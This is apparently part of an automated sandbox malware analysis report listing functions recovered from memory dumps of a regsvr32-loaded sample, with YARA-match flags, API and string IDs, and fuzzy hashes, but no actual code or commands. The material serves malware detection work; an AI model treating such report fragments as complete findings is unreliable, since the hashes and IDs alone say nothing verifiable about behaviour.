                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: A7$z$~*b
                                                                                                                                                                                                                    • API String ID: 0-275545515
                                                                                                                                                                                                                    • Opcode ID: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
                                                                                                                                                                                                                    • Instruction ID: ab028a747365116be9a9aa6efb7b35f66e0417df029292be5e784b25e2c11ad2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6541C3B180074E8FDB48CF64C48A5DE7FB0FB64398F204619E855A6250D3B896A9CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258A7F0 Relevance: 3.8, Strings: 3, Instructions: 72COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: H$rTk=${,%
                                                                                                                                                                                                                    • API String ID: 0-3174111592
                                                                                                                                                                                                                    • Opcode ID: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
                                                                                                                                                                                                                    • Instruction ID: a6d07a231facd57ff04d7789ba01ad159f5b226f84c054abaf6d427d4f9b744d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE310570528785ABD798DF28C4C991EBBF1FBC4354F906A2DF882862A0C7B9C445CB43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 000000018000B878 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 15204871-0
                                                                                                                                                                                                                    • Opcode ID: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
                                                                                                                                                                                                                    • Instruction ID: df89035e7e7b250386178c13d978bdab97caeca02fa44d79d4a04f1db2bf885c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCB12C77610B888BEB56CF29C8463987BA0F348B88F15C915EB59877A8CF39C955CB01
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180010DB0 Relevance: 3.0, APIs: 2, Instructions: 20nativeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LinkObjectOpenSymbolic
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3706036087-0
                                                                                                                                                                                                                    • Opcode ID: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
                                                                                                                                                                                                                    • Instruction ID: f4502f775a5e45d64f420efd52fcf5a6929529857e1dcb94e78d5b08d8e8d060
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23E0C230B1896842F7EA96BAAC017AB1051A34D7C0F70D429BA02C80C0DCA9C3894704
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02593FD0 Relevance: 2.9, Strings: 2, Instructions: 411COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: D?"$8zfK
                                                                                                                                                                                                                    • API String ID: 0-617590365
                                                                                                                                                                                                                    • Opcode ID: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
                                                                                                                                                                                                                    • Instruction ID: 43c560bf3fa3db8afda76cfaa0d45a5ad6e239329e80d30a5bfe4e4558707b19
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A1212B560560DCBDB68DF38C48A49E3BE1FF58308F201129FC269B2A2D774D925CB84
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258C078 Relevance: 2.9, Strings: 2, Instructions: 384COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #X$h}
                                                                                                                                                                                                                    • API String ID: 0-3021649463
                                                                                                                                                                                                                    • Opcode ID: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
                                                                                                                                                                                                                    • Instruction ID: cdaaa945b6df45aa3564fc68543d052ffae9f9184b9a7a0b092d2fd474eabbf3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4922B8709093888BEBF8DF24C885AD97BF1FF44704F90251ED84EAA690DB786645CF46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025A9910 Relevance: 2.8, Strings: 2, Instructions: 322COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #X$+ <
                                                                                                                                                                                                                    • API String ID: 0-1007305072
                                                                                                                                                                                                                    • Opcode ID: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
                                                                                                                                                                                                                    • Instruction ID: 5757375e52a957e067b6b2f96dbbc538375b046e526b2713f2df167165f50da4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 520278B5900709CFDB88CF68C58A5DD7BB9FB59308F404129FC1E9A2A0D3B4E919CB56
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259B460 Relevance: 2.8, Strings: 2, Instructions: 290COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: Hc$aYG
                                                                                                                                                                                                                    • API String ID: 0-2147329803
                                                                                                                                                                                                                    • Opcode ID: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
                                                                                                                                                                                                                    • Instruction ID: f21394f80347c908d56d5ff0c8ee13563fc068a369c810703f293e1411343ca7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59D1F17550170DCBEF58CF28C58A59E3BE5FF54308F504129FC1A962A4D7B8E829CB4A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025833D4 Relevance: 2.8, Strings: 2, Instructions: 276COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: Ip$2/
                                                                                                                                                                                                                    • API String ID: 0-2558650176
                                                                                                                                                                                                                    • Opcode ID: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
                                                                                                                                                                                                                    • Instruction ID: 2fd75a0c6af4920c7d427f5c9b7146811c45bd69fe2c0e923159af58f0fff31a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02E1D370505B888FEBB8DF28CC89BEF7BA1FB84306F10551AD84A9E290DBB45645CF45
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02584214 Relevance: 2.8, Strings: 2, Instructions: 253COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                                                                                    • String ID: h$j-`
                                                                                                                                                                                                                    • API String ID: 963392458-2572860821
                                                                                                                                                                                                                    • Opcode ID: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
                                                                                                                                                                                                                    • Instruction ID: 01c0bf86e1a6054ad78ed63d56dd06d0862b93c22241dc80bf23b8870e54f100
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBC1F371904788CFDF6CDFA8C88A59DBBB1FB58308F20421DE916AB261DBB49805CF41
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02596C70 Relevance: 2.7, Strings: 2, Instructions: 226COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #z$UP
                                                                                                                                                                                                                    • API String ID: 0-3609392360
                                                                                                                                                                                                                    • Opcode ID: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
                                                                                                                                                                                                                    • Instruction ID: 60e197ddfd5ea1dd46bb5d3da86b6718cc32486a41305ed0a7e4c1a962709c8f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01A14671904609DBDF58DFA8E4CA49EBFB0FB64388F204119E816A72A0C7749999CFC5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025A94BC Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: )bkr$z~
                                                                                                                                                                                                                    • API String ID: 0-4035444816
                                                                                                                                                                                                                    • Opcode ID: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                                                                                                                                                    • Instruction ID: d62fd2e728be5efa632544af4285b836553ebcf0e0e5076d317787279a95e38b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C817D715047898FEBB88F28CC9A7DD3BA0FB45314F508619D88ECE291DF785A89CB45
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259EC30 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: aK>$NM
                                                                                                                                                                                                                    • API String ID: 0-1076587397
                                                                                                                                                                                                                    • Opcode ID: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                                                                                                                                                    • Instruction ID: 64a40fa7a5b8da4b1e6304c2342210668a5b9fdcacfb5294e74f339888d8d10c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDB144B590030DCFDB98CF28C18A58D7BB8FB55348F505129FC1E9A2A0E3B5E614CB56
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259662C Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: GcX$cy5X
                                                                                                                                                                                                                    • API String ID: 0-3427037236
                                                                                                                                                                                                                    • Opcode ID: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                                                                                                                                                    • Instruction ID: c20d2fcee0a1f0b907f793caf8f1b376d2f6009ba5c9660c98d3702ac63d927b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46A1C7B0548388CBEBBEDF34C89A6D93BA9FB44B04F504619E84E8E290DF745745CB41
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258AC94 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: &$U
                                                                                                                                                                                                                    • API String ID: 0-326847644
                                                                                                                                                                                                                    • Opcode ID: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                                                                                                                                                    • Instruction ID: 6740e136fff0f50ed0abae414d07510368bac2bf370cf6e8ab6fa043a328cda1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 909168B590038E8FDF48CF68D88A5DE7BB0FB14348F104A19FC66AA250D7B4D665CB94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02595A00 Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: k' {$z5
                                                                                                                                                                                                                    • API String ID: 0-3484172565
                                                                                                                                                                                                                    • Opcode ID: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                                                                                                                                                    • Instruction ID: 72c78f6a45943d9479e0f74945ea43825d52b4e98c9419d00d81650fc9ebf7b0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7871F87050074A8FDB58DF24C88A5DE7BA1FB58358F514329EC8AAB250D778D954CFC8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258AAB8 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 6$D
                                                                                                                                                                                                                    • API String ID: 0-3309211938
                                                                                                                                                                                                                    • Opcode ID: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                                                                                                                                                    • Instruction ID: 010d51e7b51b49aa059098252d82629565ea437e9ea09f6ff3f3f68b3f254298
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 815159705247899BDB98DF28DC899993BE0FB05309F90622DFC86D7291C7B8D886CB45
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02593B14 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: $$%9
                                                                                                                                                                                                                    • API String ID: 0-3031553271
                                                                                                                                                                                                                    • Opcode ID: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                                                                                                                                                    • Instruction ID: a223b1cc4d5407f84710618709b2f421ec96d94ceaeb654a684472a6375ba940
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1412C7061CB85ABDB98DF19C0D562ABAE1FBC8754F90596EF486C7390C738C844CB4A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02587530 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #T$(Pv0
                                                                                                                                                                                                                    • API String ID: 0-2531358951
                                                                                                                                                                                                                    • Opcode ID: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                                                                                                                                                    • Instruction ID: 109873ed2f5d9e6a9c0cb45b1e5c0324d6cc23ba62879279beb99eb4239cef43
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A5120B050030E8BDF58DF14C88A5DE3FA1FB68398F251619EC46A6294D3B8D995CFC9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258B07C Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: gd$s=z
                                                                                                                                                                                                                    • API String ID: 0-3301279615
                                                                                                                                                                                                                    • Opcode ID: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                                                                                                                                                    • Instruction ID: e105cca88fa6cbd511301f7fb2fad731a4c3a298722a2e7703188c0c6775986a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E951E2B190030A8FDB48DF68D48A5DE7FB1FB68388F204219FC56A6250D37886A4CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02586138 Relevance: 2.6, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
